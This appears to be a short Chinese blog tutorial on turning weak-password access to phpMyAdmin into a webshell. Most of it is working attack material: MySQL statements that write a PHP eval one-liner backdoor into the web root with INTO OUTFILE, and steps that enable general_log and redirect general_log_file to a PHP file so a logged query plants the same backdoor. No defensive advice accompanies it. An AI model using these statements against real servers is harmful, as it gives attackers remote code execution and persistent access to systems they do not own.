【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
Eastsea.Chen1 小时前
MTK Android12 user版本MtkLogger
android·framework
EasyNVR4 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash7 小时前
【D01】网络安全概论
网络·安全·web安全·php
长亭外的少年8 小时前
Kotlin 编译失败问题及解决方案:从守护进程到 Gradle 配置
android·开发语言·kotlin
阿龟在奔跑8 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang9 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang9 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
好想打kuo碎9 小时前
1、HCIP之RSTP协议与STP相关安全配置
网络·安全
网络安全-老纪9 小时前
iOS应用网络安全之HTTPS
web安全·ios·https